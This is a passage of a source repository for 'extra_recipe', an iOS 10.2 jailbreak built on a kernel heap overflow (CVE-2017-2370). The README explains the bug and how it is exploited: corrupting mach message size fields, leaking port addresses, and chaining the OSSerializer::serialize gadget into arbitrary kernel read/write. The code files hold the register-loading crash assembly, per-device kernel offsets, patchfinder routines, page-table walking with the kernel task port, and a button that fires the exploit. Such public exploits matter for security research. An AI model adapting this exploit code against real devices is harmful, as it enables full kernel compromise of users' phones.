| "size" : "29x29", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "40x40", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "40x40", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "76x76", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "76x76", 61 | "scale" : "2x" 62 | } 63 | ], 64 | "info" : { 65 | "version" : 1, 66 | "author" : "xcode" 67 | } 68 | } -------------------------------------------------------------------------------- 
/extra_recipe/extra_recipe-master/extra_recipe/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 29 | 37 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/README: 
-------------------------------------------------------------------------------- 1 | // ianbeer 2 | 3 | kernel arbitrary read/write exploit for CVE-2017-2370 for iOS 10.2 4 | 5 | Only tested on iPod Touch 6G 14C92 - other devices/firmwares will not work out of the box! 6 | 7 | *** the bug *** 8 | mach_voucher_extract_attr_recipe_trap is a mach trap which can be called from any context. It's brand new code, added in iOS 10. 9 | 10 | kern_return_t 11 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 12 | { 13 | ipc_voucher_t voucher = IV_NULL; 14 | kern_return_t kr = KERN_SUCCESS; 15 | mach_msg_type_number_t sz = 0; 16 | 17 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 18 | return KERN_MEMORY_ERROR; 19 | 20 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 21 | return MIG_ARRAY_TOO_LARGE; 22 | 23 | voucher = convert_port_name_to_voucher(args->voucher_name); 24 | if (voucher == IV_NULL) 25 | return MACH_SEND_INVALID_DEST; 26 | 27 | mach_msg_type_number_t __assert_only max_sz = sz; 28 | 29 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 30 | /* keep small recipes on the stack for speed */ 31 | uint8_t krecipe[sz]; 32 | if (copyin(args->recipe, (void *)krecipe, sz)) { 33 | kr = KERN_MEMORY_ERROR; 34 | goto done; 35 | } 36 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 37 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 38 | assert(sz <= max_sz); 39 | 40 | if (kr == KERN_SUCCESS && sz > 0) 41 | kr = copyout(krecipe, (void *)args->recipe, sz); 42 | } else { 43 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 44 | if (!krecipe) { 45 | kr = KERN_RESOURCE_SHORTAGE; 46 | goto done; 47 | } 48 | 49 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 50 | kfree(krecipe, (vm_size_t)sz); 51 | kr = KERN_MEMORY_ERROR; 52 | goto done; 53 | } 54 | 55 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 56 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 
57 | assert(sz <= max_sz); 58 | 59 | if (kr == KERN_SUCCESS && sz > 0) 60 | kr = copyout(krecipe, (void *)args->recipe, sz); 61 | kfree(krecipe, (vm_size_t)sz); 62 | } 63 | 64 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 65 | 66 | done: 67 | ipc_voucher_release(voucher); 68 | return kr; 69 | } 70 | 71 | 72 | Here's the argument structure (controlled from userspace) 73 | 74 | struct mach_voucher_extract_attr_recipe_args { 75 | PAD_ARG_(mach_port_name_t, voucher_name); 76 | PAD_ARG_(mach_voucher_attr_key_t, key); 77 | PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe); 78 | PAD_ARG_(user_addr_t, recipe_size); 79 | }; 80 | 81 | recipe and recipe_size are userspace pointers. 82 | 83 | At point (a) four bytes are read from the userspace pointer recipe_size into sz. 84 | 85 | At point (b) if sz was less than MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) and greater than MACH_VOUCHER_TRAP_STACK_LIMIT (256) 86 | sz is used to allocate a kernel heap buffer. 87 | 88 | At point (c) copyin is called again to copy userspace memory into that buffer which was just allocated, but rather than passing sz (the 89 | validated size which was allocated) args->recipe_size is passed as the size. This is the userspace pointer *to* the size, not the size itself! 90 | 91 | This leads to a completely controlled kernel heap overflow. Note that the code actually can't work properly :) 92 | 93 | *** the exploit *** 94 | 95 | I target preallocated mach message buffers which are allocated via kalloc. The first 4 bytes are a size field which is used to determine 96 | where in the buffer to read and write a message. By corrupting this field we can cause mach messages to be read and written outside the bounds of 97 | the kalloc allocation backing the kmsg. 98 | 99 | There is a slight complication in that a port's preallocated kmsg will only be used for actual mach_msg sends by the kernel (not for replies 100 | to MIG methods for example.) 
This makes it a bit trickier to get enough controlled content in them. 101 | 102 | One type of mach message which the kernel sends with a lot of user-controlled data is an exception message, sent when a thread crashes. 103 | 104 | The file load_regs_and_crash.s contains ARM64 assembly which loads the ARM64 general purpose registers with the contents of a buffer 105 | such that when it crashes the exception message contains that data buffer (about 0x70 bytes are controlled.) 106 | 107 | By overwriting the port's ikm_size field to point to the header of another port we can read and write another port's header and learn where it is 108 | in memory. We can then free that second port and reallocate a user client in its place which we can also read and write. 109 | 110 | I read the userclients vtable pointer then use the OSSerializer::serialize gadget technique as detailed in 111 | [https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf] to call an arbitrary function with two controlled arguments. 112 | 113 | I call uuid_copy which calls memmove(arg0, arg1, 0x10). By pointing either arg0 or arg1 into the userclient itself (which we can read by receiving the 114 | exception message) we can read and write arbitrary kernel memory in 16 byte chunks. 115 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/ViewController.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 
7 | // 8 | 9 | import UIKit 10 | 11 | class ViewController: UIViewController { 12 | 13 | override func viewDidLoad() { 14 | super.viewDidLoad() 15 | //DispatchQueue.main.async(execute: { () -> Void in 16 | // jb_go(); 17 | //}) 18 | } 19 | 20 | 21 | override func didReceiveMemoryWarning() { 22 | super.didReceiveMemoryWarning() 23 | // Dispose of any resources that can be recreated. 24 | } 25 | 26 | @IBAction func bang(_ sender: UIButton) { 27 | var status: String 28 | switch jb_go() { 29 | case 0: 30 | status = "jailbroken" 31 | case 1: 32 | status = "internal error" 33 | case 2: 34 | status = "unsupported" 35 | case 3: 36 | status = "unsupported yet" 37 | case 42: 38 | status = "hmm... ok" 39 | default: 40 | status = "failed, reboot" 41 | } 42 | sender.isEnabled = false 43 | sender.setTitle(status, for: .disabled) 44 | } 45 | 46 | } 47 | 48 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/def.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/def.plist -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/extra_recipe-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 
3 | // 4 | 5 | int jb_go(); 6 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/launchctl -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/load_regs_and_crash.s: -------------------------------------------------------------------------------- 1 | .text 2 | .globl _load_regs_and_crash 3 | .align 2 4 | _load_regs_and_crash: 5 | mov x30, x0 6 | ldp x0, x1, [x30, 0] 7 | ldp x2, x3, [x30, 0x10] 8 | ldp x4, x5, [x30, 0x20] 9 | ldp x6, x7, [x30, 0x30] 10 | ldp x8, x9, [x30, 0x40] 11 | ldp x10, x11, [x30, 0x50] 12 | ldp x12, x13, [x30, 0x60] 13 | ldp x14, x15, [x30, 0x70] 14 | ldp x16, x17, [x30, 0x80] 15 | ldp x18, x19, [x30, 0x90] 16 | ldp x20, x21, [x30, 0xa0] 17 | ldp x22, x23, [x30, 0xb0] 18 | ldp x24, x25, [x30, 0xc0] 19 | ldp x26, x27, [x30, 0xd0] 20 | ldp x28, x29, [x30, 0xe0] 21 | brk 0 22 | .align 3 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/mach-portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/mach-portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/mach_portal.dylib: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/mach_portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/offsets.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef offsets_h 10 | #define offsets_h 11 | 12 | #define CS_VALID 0x0000001 /* dynamically valid */ 13 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 14 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 15 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 16 | 17 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 18 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 19 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 20 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 21 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 22 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 23 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 24 | 25 | #define CS_ALLOWED_MACHO 0x00ffffe 26 | 27 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 28 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 29 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 30 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 31 | 32 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 33 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 34 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 35 | #define CS_PLATFORM_PATH 0x8000000 /* 
platform binary by the fact of path (osx only) */ 36 | 37 | enum { 38 | ERR_NOERR = 0, 39 | ERR_INTERNAL = 1, 40 | ERR_UNSUPPORTED = 2, 41 | ERR_UNSUPPORTED_YET = 3, 42 | }; 43 | 44 | extern unsigned offsetof_p_pid; 45 | extern unsigned offsetof_task; 46 | extern unsigned offsetof_p_ucred; 47 | extern unsigned offsetof_p_csflags; 48 | extern unsigned offsetof_itk_self; 49 | extern unsigned offsetof_itk_sself; 50 | extern unsigned offsetof_itk_bootstrap; 51 | extern unsigned offsetof_ip_mscount; 52 | extern unsigned offsetof_ip_srights; 53 | extern unsigned offsetof_special; 54 | 55 | extern const char *mp; 56 | 57 | extern uint64_t AGXCommandQueue_vtable; 58 | extern uint64_t OSData_getMetaClass; // +8 == ret 59 | extern uint64_t OSSerializer_serialize; 60 | extern uint64_t k_uuid_copy; 61 | 62 | extern uint64_t allproc; 63 | extern uint64_t realhost; 64 | extern uint64_t call5; 65 | 66 | extern int nports; 67 | 68 | int init_offsets(void); 69 | uint64_t constget(int idx); 70 | 71 | #endif /* offsets_h */ 72 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/offsets.m: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.m 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 
7 | // 8 | 9 | #include 10 | #include 11 | 12 | #include "offsets.h" 13 | 14 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid 15 | unsigned offsetof_task = 0x18; // proc_t::task 16 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred 17 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags 18 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port) 19 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port) 20 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port) 21 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send) 22 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send) 23 | unsigned offsetof_special = 2 * sizeof(long); // host::special 24 | 25 | const char *mp = NULL; 26 | 27 | uint64_t AGXCommandQueue_vtable = 0; 28 | uint64_t OSData_getMetaClass = 0; 29 | uint64_t OSSerializer_serialize = 0; 30 | uint64_t k_uuid_copy = 0; 31 | 32 | uint64_t allproc = 0; 33 | uint64_t realhost = 0; 34 | uint64_t call5 = 0; 35 | 36 | int nports = 40000; 37 | 38 | static NSMutableArray *consttable = nil; 39 | static NSMutableArray *collide = nil; 40 | 41 | static int 42 | constload(void) 43 | { 44 | struct utsname uts; 45 | uname(&uts); 46 | if (strstr(uts.version, "Marijuan")) { 47 | return -2; 48 | } 49 | 50 | NSString *strv = [NSString stringWithUTF8String:uts.version]; 51 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 52 | int m = 0; 53 | collide = [NSMutableArray new]; 54 | 55 | for (NSDictionary *dict in dp) { 56 | if ([dict[@"vers"] isEqualToString:strv]) { 57 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 58 | int i = 0; 59 | for (NSString *str in dict[@"val"]) { 60 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 61 | i++; 62 | } 63 | m++; 64 | } 65 
| } 66 | if (m) { 67 | return 0; 68 | } 69 | return -1; 70 | } 71 | 72 | static char 73 | affine_const_by_surfacevt(uint64_t surfacevt_slid) 74 | { 75 | for (NSArray *arr in collide) { 76 | if ((surfacevt_slid & 0xfffff) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 77 | NSLog(@"affined"); 78 | consttable = arr; 79 | return 0; 80 | } 81 | } 82 | return -1; 83 | } 84 | 85 | uint64_t 86 | constget(int idx) 87 | { 88 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 89 | } 90 | 91 | static int 92 | offload(const char *hw, NSString *ios) 93 | { 94 | NSArray *dp = [[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"dex" ofType:@"plist"]]; 95 | for (NSDictionary *dict in dp) { 96 | NSArray *hw_array = dict[@"hw"]; 97 | for (NSString *h in hw_array) { 98 | if (!strcmp([h UTF8String], hw)) { 99 | NSArray *ios_array = dict[@"ios"]; 100 | for (NSString *i in ios_array) { 101 | if ([ios compare:i] == NSOrderedSame) { 102 | NSArray *a = dict[@"offsets"]; 103 | AGXCommandQueue_vtable = strtoull([[a objectAtIndex:0] UTF8String], NULL, 0); 104 | OSData_getMetaClass = strtoull([[a objectAtIndex:1] UTF8String], NULL, 0); 105 | OSSerializer_serialize = strtoull([[a objectAtIndex:2] UTF8String], NULL, 0); 106 | k_uuid_copy = strtoull([[a objectAtIndex:3] UTF8String], NULL, 0); 107 | allproc = strtoull([[a objectAtIndex:4] UTF8String], NULL, 0); 108 | realhost = strtoull([[a objectAtIndex:5] UTF8String], NULL, 0); 109 | call5 = strtoull([[a objectAtIndex:6] UTF8String], NULL, 0); 110 | NSNumber *np = dict[@"nports"]; 111 | if (np) { 112 | nports = [np intValue]; 113 | } 114 | return 0; 115 | } 116 | } 117 | } 118 | } 119 | } 120 | return -1; 121 | } 122 | 123 | int 124 | init_offsets(void) 125 | { 126 | struct utsname uts; 127 | 128 | if (uname(&uts)) { 129 | return ERR_INTERNAL; 130 | } 131 | 132 | NSString *version = [[UIDevice currentDevice] systemVersion]; 133 | // Supported versions : 10.0 ~ 10.2 134 | if ([version 
compare:@"10.0" options:NSNumericSearch] == NSOrderedAscending || 135 | [version compare:@"10.2" options:NSNumericSearch] == NSOrderedDescending) { 136 | return ERR_UNSUPPORTED; 137 | } 138 | 139 | if (!strncmp(uts.machine, "iPhone9,", sizeof("iPhone9"))) { 140 | // iPhone 7 (plus) 141 | // not supported cause of SMAP 142 | if (constload() || affine_const_by_surfacevt(0xfffffff006e521e0)) { 143 | return ERR_INTERNAL; 144 | } 145 | if ([version compare:@"10.1" options:NSNumericSearch] == NSOrderedAscending) { 146 | // 10.0[.x] 147 | mp = "@executable_path/mach-portal.dylib"; 148 | } else { 149 | // 10.1[.x] 150 | mp = "@executable_path/mach_portal.dylib"; 151 | } 152 | } 153 | 154 | if (offload(uts.machine, version) || !AGXCommandQueue_vtable) { 155 | return ERR_UNSUPPORTED_YET; 156 | } 157 | 158 | return 0; 159 | } 160 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | int init_kernel(uint64_t base, const char *filename); 5 | void term_kernel(void); 6 | 7 | enum { SearchInCore, SearchInPrelink }; 8 | 9 | uint64_t find_register_value(uint64_t where, int reg); 10 | uint64_t find_reference(uint64_t to, int n, int prelink); 11 | uint64_t find_strref(const char *string, int n, int prelink); 12 | uint64_t find_gPhysBase(void); 13 | uint64_t find_kernel_pmap(void); 14 | uint64_t find_amfiret(void); 15 | uint64_t find_ret_0(void); 16 | uint64_t find_amfi_memcmpstub(void); 17 | uint64_t find_sbops(void); 18 | uint64_t find_lwvm_mapio_patch(void); 19 | uint64_t find_lwvm_mapio_newj(void); 20 | 21 | uint64_t find_entry(void); 22 | const unsigned char *find_mh(void); 23 | 24 | uint64_t find_cpacr_write(void); 25 | uint64_t find_str(const char *string); 26 | uint64_t find_amfiops(void); 27 | uint64_t find_sysbootnonce(void); 28 | 29 | 
#endif 30 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | // Translation Table Entry format 30 | typedef union VMA_4K { 31 | struct { 32 | uint64_t block_off : 12; 33 | uint64_t level3_index : 9; 34 | uint64_t level2_index : 9; 35 | uint64_t level1_index : 9; 36 | uint64_t level0_index : 9; 37 | uint64_t ttbr_selector : 16; // Let's not really care about the upper attributes 38 | } __attribute__((packed)) vm_info; 39 | uint64_t vmaddr; 40 | } VMA_4K; 41 | typedef union VMA_16K { 42 | struct { 43 | uint64_t block_off : 14; 44 | uint64_t level3_index : 11; 45 | uint64_t level2_index : 11; 46 | 
uint64_t level1_index : 11; 47 | uint64_t level0_index : 1; 48 | uint64_t ttbr_selector : 16; 49 | } __attribute__((packed)) vm_info; 50 | uint64_t vmaddr; 51 | } VMA_16K; 52 | 53 | VMA_16K vad16; 54 | VMA_4K vad4; 55 | char isvad = 0; 56 | 57 | #define TTELog NSLog 58 | vm_size_t sz = 0; 59 | 60 | // Check if it's using 'Small pages(4K)'. If so, then the page table structs are slightly different, and there is one more level to walk through 61 | void checkvad() { 62 | if (!sz) { 63 | struct utsname u = { 0 }; 64 | uname(&u); 65 | host_page_size(mach_host_self(), &sz); 66 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 67 | if (strstr(u.machine, "iPad5,") == u.machine) { 68 | sz = 4096; // this is 4k but host_page_size lies to us 69 | } 70 | assert(sz); 71 | if (sz == 4096) { 72 | isvad = 1; 73 | } 74 | } 75 | } 76 | 77 | // Debug function 78 | void parse_block_tte(uint64_t tte) { 79 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 80 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 81 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 82 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 83 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 84 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 85 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 86 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 87 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 88 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 89 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? 
"EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 90 | } 91 | 92 | // Walk the page table 93 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 94 | 95 | // Sets the 'isvad' var 96 | checkvad(); 97 | if (!table) table = level1_table; 98 | if (!level) level = 1; 99 | 100 | vm_address_t tteaddr = 0; 101 | 102 | 103 | 104 | if (sz == 4096) { 105 | VMA_4K target_addr; 106 | target_addr.vmaddr = vmaddr; 107 | 108 | if (level == 1) { 109 | // In the case of 4K pages, the L1 table index starts from index 0x1C0 for some odd reason...?? 110 | target_addr.vm_info.level1_index -= 0x1c0; 111 | } 112 | 113 | // Calculating the Translation Table Entry's address. The same logic can be applied to all levels 114 | switch (level) { 115 | case 0: 116 | tteaddr = table + TTE_INDEX(target_addr, level0); 117 | break; 118 | case 1: 119 | tteaddr = table + TTE_INDEX(target_addr, level1); 120 | break; 121 | 122 | case 2: 123 | tteaddr = table + TTE_INDEX(target_addr, level2); 124 | break; 125 | 126 | case 3: 127 | tteaddr = table + TTE_INDEX(target_addr, level3); 128 | break; 129 | 130 | default: 131 | break; 132 | } 133 | 134 | } else if (sz == 4096*4) { 135 | VMA_16K target_addr; 136 | target_addr.vmaddr = vmaddr; 137 | 138 | // Doing the same thing as above. 
This time, there is no wierd subtracting compensation going on here 139 | switch (level) { 140 | case 0: 141 | tteaddr = table + TTE_INDEX(target_addr, level0); 142 | break; 143 | case 1: 144 | tteaddr = table + TTE_INDEX(target_addr, level1); 145 | break; 146 | 147 | case 2: 148 | tteaddr = table + TTE_INDEX(target_addr, level2); 149 | break; 150 | 151 | case 3: 152 | tteaddr = table + TTE_INDEX(target_addr, level3); 153 | break; 154 | 155 | default: 156 | break; 157 | } 158 | 159 | 160 | } 161 | 162 | // Uncomment this if you want to see that the code is working properly 163 | //parse_block_tte(level1_entry); 164 | 165 | pagestuff_64_callback(tteaddr, level); 166 | 167 | // Read the Translation Table Entry 168 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 169 | 170 | // Is it the last level? Stop the table walk? 171 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 172 | // Walk until the last level of page tables(L3) 173 | // According to the ARMv8 reference manual, if the Page uses 16K granule, then 'TTE_PHYS_VALUE_MASK' should be 0xFFFFFFFFC000ULL. 174 | // Apparantly, that is not the case for iOS CPUs it seems 175 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 176 | } 177 | } 178 | 179 | // Return the start of the physical page address, where the virtual address lies in 180 | uint64_t findphys_real(uint64_t virtaddr) { 181 | __block uint64_t physvar = 0; 182 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 183 | uint64_t tte = ReadAnywhere64(tte_addr); 184 | // If it's the last level, then save the Physical address(Page Frame) of the Virtual Address into the return var 185 | if (addr == 3) {\ 186 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 187 | } 188 | }, level1_table, isvad ? 1 : 2); 189 | 190 | // As seen in the above logic, the offset of the VMA isn't taken into account. 
Consequently, this function returns the beginning of the physical page where the VMA resides in 191 | return physvar; 192 | 193 | } 194 | 195 | // Allocates memory that lives in the kernel in the form of a VA 196 | uint64_t physalloc(uint64_t size) { 197 | uint64_t ret = 0; 198 | // Uses the kernel task port 199 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 200 | return ret; 201 | } 202 | 203 | #endif 204 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/unjail.h: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 16/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 
